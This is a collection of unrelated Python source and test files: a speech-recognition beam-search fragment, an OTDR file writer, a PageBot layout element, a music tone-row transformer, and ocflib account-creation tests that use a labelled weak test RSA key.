logging.debug("\nAttention adding <eos> to hyps ...")
ys = []
tokens_to_update = []
caches = []
for l in hyps_att:
ys.append(l)
tokens_to_update.append(eos_idx)
caches.append(hyps_att[l]['cache'])
# Weiran: one thing we could do to reduce computation is to collect those unique ys.
num_to_update = len(ys)
logging.debug("Forwarding %d attention hyps ..." % num_to_update)
if num_to_update > 0:
hs_pad = enc_output[:, :(t + 1), :].repeat([num_to_update, 1, 1])
local_att_scores, new_caches = model.decoder.batch_forward_one_step_with_cache(ys, caches, hs_pad, None)
local_att_scores = local_att_scores.numpy()
for i in range(num_to_update):
oldl = ys[i]
logging.debug("Attention: Appending %s to [%s], add to att score %f" %
(char_list[tokens_to_update[i]], " ".join([char_list[_] for _ in oldl]),
local_att_scores[i, tokens_to_update[i]]))
hyps_att[oldl]['att_score'] = hyps_att[oldl]['att_score'] + local_att_scores[i, tokens_to_update[i]]
del new_caches
logging.debug("Computing attention final scores finished ...")
logging.debug("\n")
joint_hyps = []
for l in hyps_ctc:
ctc_score = logsumexp(*hyps_ctc[l]['ctc_scores'])
att_score = hyps_att[l]['att_score']
total_score = ctc_weight * ctc_score + (1 - ctc_weight) * att_score + recog_args.lm_weight * hyps_ctc[l][
'accum_lmscore'] + penalty * len(l)
joint_hyps.append((l + (eos_idx,), total_score))
joint_hyps = sorted(joint_hyps, key=lambda x: x[1], reverse=True)[:min(len(joint_hyps), recog_args.nbest)]
# Get consistent output format.
return [{'yseq': list(l), 'score': v, 'ctc_times': hyps_ctc[l[:-1]]['ctc_times'], 'att_times': hyps_att[l[:-1]]['att_times'] + [T-1]} for l, v in joint_hyps]
|
#!/usr/bin/python
from __future__ import absolute_import, print_function, unicode_literals
import sys
import pytz
from datetime import datetime
import logging
from json2sor import tools
import re
import struct
import math
logger = logging.getLogger('pyOTDR')
unit_map = {
"mt (meters)":"mt",
"km (kilometers)":"km",
"mi (miles)" : "mi",
"kf (kilo-ft)":"kf"
}
tracetype = {
"ST[standard trace]" : 'ST',
"RT[reverse trace]" : 'RT',
"DT[difference trace]" : 'DT',
"RF[reference]" : 'RF',
}
def process(results, format):
"""
fh: file handle;
results: dict for results;
we assume mapblock.process() has already been run
"""
bname = "FxdParams"
fh = tools.getStr(bname)
params = results[bname]
fh += _process_fields(params)
return fh
# ================================================================
def _process_fields(results):
# functions to use
# 'h': get_hexstring
# 'v': get_uint
# 's': get_string
# 'i': get_signed
"""
0-3: date/time: 4 bytes
4-5: units: 2 characters
6-7: wavelength: 2 bytes
8-11: acqusition offset: 4 bytes integer
12-15: acqusition offset distance: 4 bytes integer
16-17: number of pulse width entries: 2 bytes (the next three parameters are repeated according to the number of entries)
18-19: pulse-width: 2 bytes (repeated)
20-23: sample spacing: 4 bytes (repeated)
24-27: number of data points in trace: 4 bytes (repeated)
28-31: index of refraction: 4 bytes
32-33: backscattering coefficient: 2 bytes
34-37: number of averages (?): 4 bytes
38-39: averaging time: 2 bytes
40-43: range (?): 4 bytes
44-47: acquisition range distance: 4 bytes signed int
48-51: front panel offset: 4 bytes signed int
52-53: noise floor level: 2 bytes
54-55: noise floor scaling factor: 2 bytes signed int
56-57: power offset first point: 2 bytes
58-59: loss threshold: 2 bytes
60-61: reflection threshold: 2 bytes
62-63: end-of-transmission threshold: 2 bytes
64-65: trace type: 2 characters
66-69: X1: 4 bytes signed int
70-73: Y1: 4 bytes signed int
74-77: X2: 4 bytes signed int
78-81: Y2: 4 bytes signed int
"""
unix = re.search(r'\d+',results['date/time'].split('(')[1]).group()
xstr = struct.pack('<I', int(unix))
xstr += bytearray(results['unit'][0:2], 'ascii')
wave = float(results['wavelength'].replace(' nm', ''))/0.1
xstr += tools.get_uint(int(wave))
xstr += tools.get_signed(results['acquisition offset'],4)
xstr += tools.get_signed(results['acquisition offset distance'], 4)
xstr += tools.get_uint(results['number of pulse width entries'])
xstr += tools.get_uint(results['pulse width'])
ss = re.search(r'\d+', results['sample spacing']).group()
xstr += tools.get_uint(int(float(ss) / 1e-8),4)
xstr += tools.get_uint(int(results['num data points']), 4)
# print("Number data points => {}".format(results['num data points']))
index = float(results['index']) * 100000
xstr += tools.get_uint(int(index), 4)
bc=float(results['BC'].replace(' dB', '')) / -0.1
xstr += tools.get_uint(int(bc))
xstr += tools.get_uint(results['num averages'], 4)
avt=results['averaging time'].replace(' sec', '')
xstr += tools.get_uint(int(avt))
rng =int(results['range'] / 2e-5)
xstr += tools.get_uint(int(rng), 4)
# print("Range => {}".format(rng))
# print("Range distance => {}".format(results['acquisition range distance']))
xstr += tools.get_signed(results['acquisition range distance'], 4)
xstr += tools.get_signed(results['front panel offset'], 4)
xstr += tools.get_uint(results['noise floor level'], 2)
xstr += tools.get_signed(results['noise floor scaling factor'], 2)
xstr += tools.get_uint(results['power offset first point'])
'''threshold'''
lth = float(results['loss thr'].replace(' dB', '')) / 0.001
ref = float(results['refl thr'].replace(' dB', '')) /-0.001
eot = float(results['EOT thr'].replace(' dB', '')) / 0.001
xstr += tools.get_uint(int(lth), 2)
xstr += tools.get_uint(math.ceil(ref), 2)
xstr += tools.get_uint(math.ceil(eot), 2)
xstr += bytearray(results['trace type'][0:2],'ascii')
xstr += tools.get_signed(results['X1'],4)
xstr += tools.get_signed(results['Y1'],4)
xstr += tools.get_signed(results['X2'],4)
xstr += tools.get_signed(results['Y2'],4)
return xstr
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
#
# P A G E B O T
#
# Copyright (c) 2016+ Buro Petr van Blokland + Claudia Mens
# www.pagebot.io
# Licensed under MIT conditions
#
# Supporting DrawBot, www.drawbot.com
# Supporting Flat, xxyxyz.org/flat
# -----------------------------------------------------------------------------
#
# stacked.py
#
from random import choice
from pagebot.elements.variablefonts.basefontshow import BaseFontShow
from pagebot.constants import JUSTIFIED, LEFT, ORIGIN
from pagebot.contributions.filibuster.blurb import Blurb
from pagebot.toolbox.units import pointOffset
class Stacked(BaseFontShow):
"""Showing the specified (variable) font as full page with a matrix
of all glyphs in the font.
Usage of standard style parameters
fill Fill color for the background of the element
stroke Draw frame around the element
textFill Color of the text. Default is black.
padding Use in case of background color or frame. Default is 0
"""
def __init__(self, f, words=None, labelFontSize=None, **kwargs):
"""
>>> from pagebot.fonttoolbox.objects.font import findFont
>>> from pagebot.document import Document
>>> from pagebot.constants import Letter
>>> from pagebot import getContext
>>> from pagebot.conditions import *
>>> from pagebot.toolbox.units import em
>>> c = getContext()
>>> w, h = Letter
>>> doc = Document(w=w, h=h, padding=80, autoPages=2, context=c)
>>> conditions = [Fit()]
>>> page = doc[1]
>>> font1 = findFont('AmstelvarAlpha-VF')
>>> style = dict(gh=16, fill=0.95, leading=em(1.4))
>>> gs = Stacked(font1, parent=page, conditions=conditions, padding=40, style=style, context=c)
>>> page = doc[2]
>>> font2 = findFont('RobotoDelta-VF')
>>> #font2 = findFont('Upgrade-Regular')
>>> #font2 = findFont('Escrow-Bold')
>>> style = dict(stroke=0, strokeWidth=0.25, gh=8, leading=em(1.4))
>>> gs = Stacked(font2, parent=page, conditions=conditions, style=style, padding=40, context=c)
>>> score = doc.solve()
>>> # FIXME
>>> #doc.export('_export/%sStacked.pdf' % font1.info.familyName)
"""
BaseFontShow.__init__(self, **kwargs)
self.f = f # Font instance
self.words = words or {} # Optional dictionary for headline words. Keys is frame index number.
self.usedText = set() # Avoid double use of headline words.
# Add semi-random generated content, styles of fitting.
self.blurb = Blurb() # Random content creator, in case there is no content supplied.
self.lineTag = 'design_headline' # Default label where to find random word choices.
self.headlineTag = 'design_headline' # Default label where to find (or create) random headline text.
self.textTag = 'da_text' # Default label where to find (or create) random body text.
def build(self, view, origin=ORIGIN, **kwargs):
"""Default drawing method just drawing the frame.
Probably will be redefined by inheriting element classes."""
c = self.context
p = pointOffset(self.origin, origin)
p = self._applyScale(view, p)
p = self._applyAlignment(p) # Ignore z-axis for now.
self.buildFrame(view, p) # Draw optional background fill, frame or borders.
# Let the view draw frame info for debugging, in case view.showFrame == True
view.drawElementFrame(self, p)
# Draw that actual content of the element by stacked specimen rectangles.
self.drawStacked(view, p, **kwargs)
self._restoreScale(view)
view.drawElementInfo(self, origin) # Depends on flag 'view.showElementInfo'
def getText(self, tag, cnt=None, charCnt=None):
"""If the tag type of text is in self.words, then take a random choice from there.
Otherwise use the tag to create a blurb with the specified length."""
if tag in self.words:
text = choice(self.words[tag])
if text in self.usedText: # Already used, try once more.
text = choice(self.words[tag])
else:
text = self.blurb.getBlurb(tag, cnt=cnt, charCnt=charCnt)
self.usedText.add(text)
return text
def drawStacked(self, view, origin, **kwargs):
"""Draw the content of the element, responding to size, styles, font and content."""
c = self.context
# Start on top left, with respect to optional padding value.
x = self.pl
y = self.h-self.pt
# Top headline. (x,y) is top-left of the box, passed on for the position of the next box.
s = self.getText(self.lineTag, charCnt=10).upper()
x, y = self.buildStackedLine(s, origin, x, y, self.pw, wght=0.7, wdth=-0.4)
# Second headline
s = self.getText(self.lineTag, 4, 18)
x, y = self.buildStackedLine(s, origin, x, y, self.pw, wght=-0.7)
# Some large headline thing
s = self.getText(self.lineTag, 5, 24)
x, y = self.buildStackedLine(s, origin, x, y, self.pw, wght=0.3, wdth=-0.4)
# Body text 16/24
s = self.getText(self.textTag, 20)
x, y = self.buildText(None, s, origin, x, y, self.pw, None, 16, JUSTIFIED)
# Body text 12/18
s = self.getText(self.textTag, 30)
x, y = self.buildText(None, s, origin, x, y, self.pw, None, 12, JUSTIFIED)
# Body text 10/15
s1 = self.getText(self.headlineTag)
s2 = self.getText(self.textTag, cnt=20)
x, y = self.buildText(s1, s2, origin, x, y, self.pw, None, 10, JUSTIFIED, Bwght=0.7, Bwdth=-0.1)
# Body text 9/13.5
# Don't update to the new y, next colomn needs to be on the right, starting at the same y.
s1 = self.getText(self.headlineTag)
s2 = self.getText(self.textTag) + ' ' + self.getText(self.textTag)
x, _ = self.buildText(s1, s2, origin, x, y, (self.pw-self.gw)/2, y-self.pb,
9, LEFT, labelSize=7, Bwght=0.6, Bwdth=-0.1)
# Body text 8/12
s1 = self.getText(self.headlineTag)
s2 = self.getText(self.textTag) + ' ' + self.getText(self.textTag)
x, y = self.buildText(s1, s2, origin, x+(self.pw+self.gw)/2, y, (self.pw-self.gw)/2, y-self.pb,
8, LEFT, labelSize=7, Bwght=0.6, Bwdth=-0.1)
if __name__ == '__main__':
import doctest
import sys
sys.exit(doctest.testmod()[0])
|
"""Helper functions."""
import random
def make_id(stringLength=10):
"""Create an id with given length."""
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
return "".join(random.choice(letters) for i in range(stringLength))
|
"""
Transform a fragment in progress.
Note that intermediate functions from this module modify only `temporal_content` and
`sonic_content` attributes, but `melodic_lines` and `sonorities` attributes are left unchanged.
This is done for the sake of performance. It is cheaper to update all dependent attributes
just once after all transformations are applied. So use `transform` function to get
consistent fragment.
Author: Nikolay Lysenko
"""
import itertools
import random
from typing import Any, Callable
from .fragment import Fragment, SUPPORTED_DURATIONS, override_calculated_attributes
from .music_theory import (
TONE_ROW_LEN, invert_tone_row, revert_tone_row, rotate_tone_row, transpose_tone_row
)
TRANSFORMATIONS_REGISTRY_TYPE = dict[str, tuple[Callable, list[Any]]]
def get_duration_changes() -> dict[tuple[float, float], list[tuple[float, float]]]:
"""
Get mapping from durations of two events to list of pairs of durations of the same total sum.
:return:
mapping from durations of two events to list of pairs of durations of the same total sum
"""
result = {}
cartesian_product = itertools.product(SUPPORTED_DURATIONS, SUPPORTED_DURATIONS)
for first_duration, second_duration in cartesian_product:
if first_duration > second_duration:
continue
total_sum = first_duration + second_duration
durations = []
for duration in SUPPORTED_DURATIONS:
complementary_duration = total_sum - duration
if complementary_duration in SUPPORTED_DURATIONS:
durations.append((duration, complementary_duration))
result[(first_duration, second_duration)] = durations
return result
def draw_random_indices(
mutable_sonic_content_indices: list[int], n_tone_row_instances_by_group: list[int]
) -> tuple[int, int]:
"""
Draw index of melodic lines group and index of tone row instance from it.
:param mutable_sonic_content_indices:
indices of groups such that their sonic content can be transformed
:param n_tone_row_instances_by_group:
list where number of tone row instances in the group is stored for each group of
melodic lines sharing the same series (in terms of vertical distribution of series pitches)
:return:
index of group and index of tone row instance from it
"""
group_index = random.choice(mutable_sonic_content_indices)
n_instances = n_tone_row_instances_by_group[group_index]
instance_index = random.randrange(0, n_instances)
return group_index, instance_index
def find_instance_by_indices(
fragment: Fragment, group_index: int, instance_index: int
) -> list[str]:
"""
Find sequence of 12 pitch classes by its indices.
:param fragment:
a fragment
:param group_index:
index of group of melodic lines sharing the same series (in terms of vertical distribution
of series pitches)
:param instance_index:
index of tone row instance within sonic content of the group
:return:
sequence of 12 pitch classes
"""
line = fragment.sonic_content[group_index]
start_event_index = instance_index * TONE_ROW_LEN
end_event_index = (instance_index + 1) * TONE_ROW_LEN
pitch_classes = []
index = 0
for pitch_class in line:
if pitch_class == 'pause':
continue
if index >= end_event_index:
break
if index >= start_event_index:
pitch_classes.append(pitch_class)
index += 1
return pitch_classes
def replace_instance(
fragment: Fragment, group_index: int, instance_index: int, new_instance: list[str]
) -> Fragment:
"""
Replace a particular sequence of 12 tones with another sequence of 12 tones.
:param fragment:
a fragment
:param group_index:
index of group of melodic lines sharing the same series (in terms of vertical distribution
of series pitches)
:param instance_index:
index of tone row instance within sonic content of the group
:param new_instance:
new sequence of 12 pitch classes
:return:
modified fragment
"""
line = fragment.sonic_content[group_index]
start_event_index = instance_index * TONE_ROW_LEN
end_event_index = (instance_index + 1) * TONE_ROW_LEN
index_without_pauses = 0
for index, pitch_class in enumerate(line):
if pitch_class == 'pause':
continue
if index_without_pauses >= end_event_index:
break
if index_without_pauses >= start_event_index:
line[index] = new_instance.pop(0)
index_without_pauses += 1
return fragment
def apply_duration_change(
fragment: Fragment,
duration_changes: dict[tuple[float, float], list[tuple[float, float]]]
) -> Fragment:
"""
Change durations of two random events from the same melodic line.
:param fragment:
a fragment to be modified
:param duration_changes:
mapping from durations of two events to list of pairs of durations of the same total sum
:return:
modified fragment
"""
line_index = random.choice(fragment.mutable_temporal_content_indices)
line_durations = fragment.temporal_content[line_index]
events_indices = random.sample(range(len(line_durations)), 2)
key = tuple(sorted(line_durations[event_index] for event_index in events_indices))
all_durations = duration_changes[key]
durations = random.choice(all_durations)
for event_index, duration in zip(events_indices, durations):
line_durations[event_index] = duration
return fragment
def apply_pause_shift(fragment: Fragment) -> Fragment:
"""
Shift a random pause one position to the left or to the right.
:param fragment:
a fragment to be modified
:return:
modified fragment
"""
line = random.choice(fragment.sonic_content)
indices = []
for index, (previous_pitch_class, pitch_class) in enumerate(zip(line, line[1:])):
if pitch_class == 'pause' and previous_pitch_class != 'pause':
indices.append(index)
if pitch_class != 'pause' and previous_pitch_class == 'pause':
indices.append(index)
if not indices:
return fragment
index = random.choice(indices)
line[index], line[index + 1] = line[index + 1], line[index]
return fragment
def apply_inversion(fragment: Fragment) -> Fragment:
"""
Invert one random series (transformed tone row instance).
:param fragment:
a fragment to be modified
:return:
modified fragment
"""
group_index, instance_index = draw_random_indices(
fragment.mutable_sonic_content_indices, fragment.n_tone_row_instances_by_group
)
tone_row_instance = find_instance_by_indices(fragment, group_index, instance_index)
tone_row_instance = invert_tone_row(tone_row_instance)
fragment = replace_instance(fragment, group_index, instance_index, tone_row_instance)
return fragment
def apply_reversion(fragment: Fragment) -> Fragment:
"""
Revert one random series (transformed tone row instance).
:param fragment:
a fragment to be modified
:return:
modified fragment
"""
group_index, instance_index = draw_random_indices(
fragment.mutable_sonic_content_indices, fragment.n_tone_row_instances_by_group
)
tone_row_instance = find_instance_by_indices(fragment, group_index, instance_index)
tone_row_instance = revert_tone_row(tone_row_instance)
fragment = replace_instance(fragment, group_index, instance_index, tone_row_instance)
return fragment
def apply_rotation(fragment: Fragment, max_rotation: int) -> Fragment:
"""
Rotate one random series (transformed tone row instance).
:param fragment:
a fragment to be modified
:param max_rotation:
maximum size of rotation (in elements)
:return:
modified fragment
"""
group_index, instance_index = draw_random_indices(
fragment.mutable_sonic_content_indices, fragment.n_tone_row_instances_by_group
)
tone_row_instance = find_instance_by_indices(fragment, group_index, instance_index)
shift = random.randint(-max_rotation, max_rotation)
tone_row_instance = rotate_tone_row(tone_row_instance, shift)
fragment = replace_instance(fragment, group_index, instance_index, tone_row_instance)
return fragment
def apply_transposition(fragment: Fragment, max_transposition: int) -> Fragment:
"""
Transpose one random series (transformed tone row instance).
:param fragment:
a fragment to be modified
:param max_transposition:
maximum interval of transposition (in semitones)
:return:
modified fragment
"""
group_index, instance_index = draw_random_indices(
fragment.mutable_sonic_content_indices, fragment.n_tone_row_instances_by_group
)
tone_row_instance = find_instance_by_indices(fragment, group_index, instance_index)
shift = random.randint(-max_transposition, max_transposition)
tone_row_instance = transpose_tone_row(tone_row_instance, shift)
fragment = replace_instance(fragment, group_index, instance_index, tone_row_instance)
return fragment
def create_transformations_registry(
max_rotation: int, max_transposition: int
) -> TRANSFORMATIONS_REGISTRY_TYPE:
"""
Get mapping from names to corresponding transformations and their arguments.
:param max_rotation:
maximum size of rotation (in elements)
:param max_transposition:
maximum interval of transposition (in semitones)
:return:
registry of transformations
"""
registry = {
'duration_change': (apply_duration_change, [get_duration_changes()]),
'pause_shift': (apply_pause_shift, []),
'inversion': (apply_inversion, []),
'reversion': (apply_reversion, []),
'rotation': (apply_rotation, [max_rotation]),
'transposition': (apply_transposition, [max_transposition]),
}
return registry
def transform(
fragment: Fragment,
n_transformations: int,
transformation_registry: TRANSFORMATIONS_REGISTRY_TYPE,
transformation_names: list[str],
transformation_probabilities: list[float]
) -> Fragment:
"""
Apply multiple random transformations to a fragment.
:param fragment:
a fragment to be modified
:param n_transformations:
number of transformations to be applied
:param transformation_registry:
mapping from names to corresponding transformations and their arguments
:param transformation_names:
names of transformations to choose from
:param transformation_probabilities:
probabilities of corresponding transformations; this argument must have the same length
as `transformation_names`
:return:
modified fragment
"""
names_of_transformations_to_be_applied = random.choices(
transformation_names,
transformation_probabilities,
k=n_transformations
)
for transformation_name in names_of_transformations_to_be_applied:
transformation_fn, args = transformation_registry[transformation_name]
fragment = transformation_fn(fragment, *args)
fragment = override_calculated_attributes(fragment)
return fragment
|
import pytest
import connexion
from app import usersData
@pytest.fixture(scope='module')
def client():
flask_app = connexion.FlaskApp(__name__)
with flask_app.app.test_client() as c:
yield c
def test_get_health(client):
# GIVEN no query parameters or payload
# WHEN I access to the url GET /health
# THEN the HTTP response is 404 not found
response = client.get('/health')
assert response.status_code == 404
def test_fetch_users(client):
# GIVEN not query parameters or payload
# WHEN I access to the url GET /api/v1/users
# THEN the HTTP response is 200
response = client.get('/api/v1/users')
assert response.status_code == 404
|
from contextlib import contextmanager
from datetime import datetime
from datetime import timezone
from textwrap import dedent
import mock
import pytest
from Crypto.PublicKey import RSA
from freezegun import freeze_time
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from ocflib.account.creation import _get_first_available_uid
from ocflib.account.creation import _KNOWN_UID
from ocflib.account.creation import create_account
from ocflib.account.creation import create_home_dir
from ocflib.account.creation import decrypt_password
from ocflib.account.creation import eligible_for_account
from ocflib.account.creation import encrypt_password
from ocflib.account.creation import ensure_web_dir
from ocflib.account.creation import NewAccountRequest
from ocflib.account.creation import send_created_mail
from ocflib.account.creation import send_rejected_mail
from ocflib.account.creation import validate_callink_oid
from ocflib.account.creation import validate_calnet_uid
from ocflib.account.creation import validate_email
from ocflib.account.creation import validate_password
from ocflib.account.creation import validate_request
from ocflib.account.creation import validate_username
from ocflib.account.creation import ValidationError
from ocflib.account.creation import ValidationWarning
from ocflib.account.submission import AccountCreationCredentials
from ocflib.account.submission import Base
from ocflib.infra.ldap import ldap_ocf
from ocflib.infra.ldap import OCF_LDAP_PEOPLE
WEAK_KEY = dedent(
"""\
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQDGkGNFk/yy8HphSvvsmCpMF1vGbJeZXw2AmlLfTLcGJkZuvelu
qJTGepGjeEeML6GrE03dI330mWtnC8jdhmwaELndqoPQ3Ks1eXF5usvDeYoRVir0
ekqJtd2+7eBQ4xrRIA5YohoE31VGQ7ZaQ0GLMuWjldTe3bx+5OJqB0pE5QIDAQAB
AoGAZtTX1GyzbagEeOZwWTLklMt0B+qtCAyl3XgOev4rus+PokJP5bMAeVl4mwPr
aboxK3uv01pSHJ5ndNIxkCfRSzSuKvddfoaDrP97dbS0boqHyJmG38U2kxaMufBP
rFP4a05TajdU9/rQSaGGmTkgDmRfJId5aDfJh6ToKMEYnQECQQDYb0Nj9mAWz5ja
btXyegMespiK1UnyrZlRKsm0zcnEZ4NBE/lgMiJJXkfhdS5af9ORPmDjlQfwuHtZ
N5mEKXNRAkEA6tzQPWCIL3gz0FYVX+l00JTFRIFA1yfvHiF4XjNZUr1TjXdGhto5
DqV39XTk1CPtXNJto9AmNLf8zJD5xsqLVQJAToXnfD/p0rzUpwMpSgSsVxnSsCP7
5TjIdCNC9P7oYgJwI0883YKy38195LVf8OOJfZuVCVyLefFkhxTd9I4ZUQJAO0ft
D/DzrveqLGXuEz18DMHgYQA2+5fK1VIhbbWMUEQVeNmoZZVjXX0KoFwW/izrVsiO
gBCj9B6UopXdVf392QJAcCUgxV6Ca6iWplAKHsaJ7sG+aQOaYI8m3d3MqJ5g34GB
CqXzvT0v5ZrGj+K9dWDb+pYvGWhc2iU/e40yyj0G9w==
-----END RSA PRIVATE KEY-----"""
)
@pytest.fixture
def session(fake_credentials):
engine = create_engine(fake_credentials.mysql_uri)
Base.metadata.create_all(engine)
return sessionmaker(bind=engine)()
@pytest.yield_fixture
def fake_new_account_request(mock_rsa_key):
yield NewAccountRequest(
user_name='someuser',
real_name='Some User',
is_group=False,
calnet_uid=123456,
callink_oid=None,
email='some.user@ocf.berkeley.edu',
encrypted_password=encrypt_password('hunter20000000', RSA.importKey(WEAK_KEY)),
handle_warnings=NewAccountRequest.WARNINGS_WARN,
)
@pytest.yield_fixture
def mock_rsa_key(tmpdir):
test_key = tmpdir.join('test.key')
test_key.write((WEAK_KEY + '\n').encode('ascii'))
yield test_key.strpath
test_key.remove()
class TestFirstAvailableUID:
def test_first_uid(self):
connection = mock.Mock(response=[
{'attributes': {'uidNumber': 999000}},
{'attributes': {'uidNumber': 999200}},
{'attributes': {'uidNumber': 999100}},
])
@contextmanager
def ldap_ocf():
yield connection
with mock.patch('ocflib.account.creation.ldap_ocf', ldap_ocf):
next_uid = _get_first_available_uid()
assert next_uid == 999201
def test_reserved_uid(self):
"""Test that we skip over the reserved UID range of 61184-65535.
"""
connection = mock.Mock(response=[
{'attributes': {'uidNumber': 61183}},
{'attributes': {'uidNumber': 60000}},
])
@contextmanager
def ldap_ocf():
yield connection
with mock.patch('ocflib.account.creation.ldap_ocf', ldap_ocf):
next_uid = _get_first_available_uid()
assert next_uid == 65536
def test_max_uid_constant_not_too_small(self):
"""Test that the _KNOWN_UID constant is sufficiently large.
The way we find the next available UID is very slow because there is no
way to do a query like "find the max UID from all users" in LDAP.
We instead have to find all users and take the max ourselves. This can
take ~15 seconds.
By hardcoding a known min, we just select accounts with uid >
_KNOWN_UID, which is much faster. This makes finding available UIDs
faster the first time a query is made. The result can be cached to make
subsequent attempts even faster.
"""
with ldap_ocf() as c:
c.search(
OCF_LDAP_PEOPLE,
'(uidNumber>={KNOWN_MIN})'.format(KNOWN_MIN=_KNOWN_UID),
attributes=['uidNumber'],
)
num_uids = len(c.response)
if num_uids > 3500:
raise AssertionError((
'Found {} accounts with UID >= {}, you should bump the constant for speed.'
).format(num_uids, _KNOWN_UID))
class TestCreateDirectories:
@mock.patch('subprocess.check_call')
def test_create_home_dir(self, check_call):
create_home_dir('ckuehl')
calls = [mock.call(
['sudo', 'install', '-d', '--mode=0700', '--group=ocf',
'--owner=ckuehl', '/home/c/ck/ckuehl'],
)]
check_call.assert_has_calls(calls)
@mock.patch('os.path.exists', return_value=False)
@mock.patch('subprocess.check_call')
def test_ensure_web_dir(self, check_call, _):
ensure_web_dir('ckuehl')
check_call.assert_has_calls([
mock.call([
'sudo', 'install', '-d', '--mode=0755', '--group=ocf', '--owner=ckuehl',
'--', '/services/http/users/c/ckuehl',
]),
mock.call([
'sudo', '-u', 'ckuehl', 'ln', '-fs', '--',
'/services/http/users/c/ckuehl', '/home/c/ck/ckuehl/public_html',
]),
])
def test_ensure_web_dir_existing(self):
with mock.patch('os.path.exists', return_value=True), \
mock.patch('os.path.realpath', return_value='/services/http/users/c/ckuehl'), \
mock.patch('subprocess.check_call') as check_call:
ensure_web_dir('ckuehl')
check_call.assert_has_calls([
mock.call([
'sudo', 'install', '-d', '--mode=0755', '--group=ocf', '--owner=ckuehl',
'--', '/services/http/users/c/ckuehl',
]),
mock.call([
'sudo', '-u', 'ckuehl', 'ln', '-fs', '--',
'/services/http/users/c/ckuehl', '/home/c/ck/ckuehl/public_html',
]),
])
def test_ensure_web_dir_rename(self):
with mock.patch('os.path.exists', return_value=True), \
mock.patch('os.path.realpath', return_value='/home/c/ck/ckuehl/public_html'), \
mock.patch('subprocess.check_call') as check_call, \
freeze_time('2015-08-22 14:11:44'):
ensure_web_dir('ckuehl')
check_call.assert_has_calls([
mock.call([
'sudo', 'install', '-d', '--mode=0755', '--group=ocf', '--owner=ckuehl',
'--', '/services/http/users/c/ckuehl',
]),
mock.call([
'sudo', 'mv',
'/home/c/ck/ckuehl/public_html', '/home/c/ck/ckuehl/public_html.08222015-141144'
]),
mock.call([
'sudo', '-u', 'ckuehl', 'ln', '-fs', '--',
'/services/http/users/c/ckuehl', '/home/c/ck/ckuehl/public_html',
]),
])
class TestUsernameCheck:
@pytest.mark.parametrize('username', [
'shitup',
'ucbcop',
'suxocf',
])
@mock.patch('ocflib.account.search.user_exists', return_value=False)
def test_warning_names(self, _, username):
"""Ensure that we raise warnings when bad/restricted words appear."""
with pytest.raises(ValidationWarning):
validate_username(username, username)
@pytest.mark.parametrize('username', [
'wordpress',
'systemd',
'ocf',
'ocfrocks',
])
@mock.patch('ocflib.account.search.user_exists', return_value=False)
def test_error_names(self, _, username):
"""Ensure that we raise errors when appropriate."""
with pytest.raises(ValidationError):
validate_username(username, username)
def test_error_user_exists(self):
"""Ensure that we raise an error if the username already exists."""
with pytest.raises(ValidationError):
validate_username('ckuehl', 'Chris Kuehl')
class TestAccountEligibility:
@pytest.mark.parametrize('bad_uid', [
1101587, # good uid, but already has account
9999999999, # fake uid, not in university ldap
])
def test_validate_calnet_uid_error(self, bad_uid):
with pytest.raises(ValidationError):
validate_calnet_uid(bad_uid)
def test_validate_calnet_uid_success(self, mock_valid_calnet_uid):
validate_calnet_uid(9999999999999)
@pytest.mark.skip(reason='Checking for affiliations temp. patched out (ocflib PR 140)')
def test_validate_calnet_affiliations_failure(self, mock_invalid_calnet_uid):
with pytest.raises(ValidationWarning):
validate_calnet_uid(9999999999999)
@pytest.mark.parametrize('affiliations,eligible', [
(['AFFILIATE-TYPE-CONSULTANT'], True),
(['AFFILIATE-TYPE-CONSULTANT', 'AFFILIATE-STATUS-EXPIRED'], False),
(['EMPLOYEE-TYPE-ACADEMIC'], True),
(['EMPLOYEE-TYPE-STAFF'], True),
(['EMPLOYEE-TYPE-ACADEMIC', 'EMPLOYEE-STATUS-EXPIRED'], False),
(['EMPLOYEE-STATUS-EXPIRED', 'AFFILIATE-TYPE-CONSULTANT'], True),
(['EMPLOYEE-STATUS-EXPIRED', 'STUDENT-TYPE-REGISTERED'], True),
(['STUDENT-TYPE-REGISTERED'], True),
(['STUDENT-TYPE-NOT REGISTERED'], True),
(['STUDENT-TYPE-REGISTERED', 'STUDENT-STATUS-EXPIRED'], False),
(['STUDENT-TYPE-NOT REGISTERED', 'STUDENT-STATUS-EXPIRED'], False),
(['STUDENT-STATUS-EXPIRED'], False),
([], False),
])
def test_affiliations(self, affiliations, eligible):
assert eligible_for_account(affiliations) == eligible
class TestSendMail:
FREE_PRINTING_TEXT = 'pages of free printing per semester'
VHOST_TEXT = 'virtual hosting'
@mock.patch('ocflib.account.creation.send_mail')
def test_send_created_mail_individual(self, send_mail, fake_new_account_request):
fake_new_account_request = fake_new_account_request._replace(is_group=False)
send_created_mail(fake_new_account_request)
send_mail.assert_called_once_with(
fake_new_account_request.email,
'[OCF] Your account has been created!',
mock.ANY,
)
body = send_mail.call_args[0][2]
assert self.FREE_PRINTING_TEXT in body
assert self.VHOST_TEXT not in body
@mock.patch('ocflib.account.creation.send_mail')
def test_send_created_mail_group(self, send_mail, fake_new_account_request):
fake_new_account_request = fake_new_account_request._replace(is_group=True)
send_created_mail(fake_new_account_request)
send_mail.assert_called_once_with(
fake_new_account_request.email,
'[OCF] Your account has been created!',
mock.ANY,
)
body = send_mail.call_args[0][2]
assert self.FREE_PRINTING_TEXT not in body
assert self.VHOST_TEXT in body
@mock.patch('ocflib.account.creation.send_mail')
def test_send_rejected_mail(self, send_mail, fake_new_account_request):
send_rejected_mail(fake_new_account_request, 'some reason')
send_mail.called_called_once_with(
fake_new_account_request.email,
'[OCF] Your account has been created!',
mock.ANY,
)
class TestPasswordEncryption:
@pytest.mark.parametrize('password', [
'hello world',
'hunter2',
'mock_send_mail_user.assert_called_once_with',
])
def test_encrypt_decrypt_password(self, password, mock_rsa_key):
assert decrypt_password(
encrypt_password(password, RSA.importKey(WEAK_KEY)),
RSA.importKey(WEAK_KEY),
) == password
class TestValidateCallinkOid:
@pytest.mark.parametrize('oid', [0, 123123123])
def test_valid_oid(self, oid):
validate_callink_oid(oid)
@pytest.mark.parametrize('oid', [46130, 46187])
def test_invalid_oid(self, oid):
with pytest.raises(ValidationWarning):
validate_callink_oid(oid)
class TestValidateEmail:
